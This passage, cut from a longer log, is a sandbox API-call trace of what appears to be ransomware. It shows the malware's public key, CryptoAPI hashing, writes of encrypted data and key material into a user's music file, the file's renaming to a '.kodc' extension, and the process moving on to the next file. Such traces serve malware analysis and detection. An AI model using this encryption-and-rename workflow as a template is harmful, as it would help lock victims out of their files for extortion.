KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.011] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0102.011] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0102.012] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0102.012] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0102.012] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0102.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0102.012] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0102.012] GetLastError () returned 0x0 [0102.012] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0102.012] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0102.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.012] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0102.012] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0102.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.012] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0102.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb240) returned 0x9ba8d90 [0102.013] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0102.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6628 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8208 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6670 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8220 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8268 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0102.013] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0102.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0102.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0102.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0102.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8268 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8250 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0102.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0102.014] GetCurrentThreadId () returned 0x42c [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0102.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x332c9d8 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.015] GetCurrentThreadId () returned 0x42c [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0102.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0102.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8268 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8238 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0102.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0102.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8280 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8250 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8250 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0102.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0102.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8280 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8268 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8238 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8220 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb6670 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0102.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0102.019] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0xb23e, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xb23e, lpOverlapped=0x0) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0102.019] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb243, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.019] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0102.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0102.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0102.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0102.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0102.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0102.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0102.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0102.020] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0102.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0102.020] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0102.020] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0102.020] CloseHandle (hObject=0x5cc) returned 1 [0102.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0102.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x9bb8980 [0102.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0102.022] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\bg-t2NyhqrG.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\bg-t2nyhqrg.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\bg-t2NyhqrG.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\bg-t2nyhqrg.m4a.kodc")) returned 1 [0102.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8980 | out: hHeap=0x630000) returned 1 [0102.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.023] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0102.024] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6ff3d0, ftCreationTime.dwHighDateTime=0x1d5b92d, ftLastAccessTime.dwLowDateTime=0xe79f0b40, ftLastAccessTime.dwHighDateTime=0x1d5b695, ftLastWriteTime.dwLowDateTime=0xe79f0b40, ftLastWriteTime.dwHighDateTime=0x1d5b695, nFileSizeHigh=0x0, nFileSizeLow=0xfb77, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eS_6wkd7jpEVWnFA.mp3", cAlternateFileName="ES_6WK~1.MP3")) returned 1 [0102.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0102.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0102.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0102.024] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\eS_6wkd7jpEVWnFA.mp3") returned=".mp3" [0102.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\eS_6wkd7jpEVWnFA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\es_6wkd7jpevwnfa.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0102.025] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=64375) returned 1 [0102.025] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0102.028] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfb51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.028] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0102.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0102.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0102.029] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 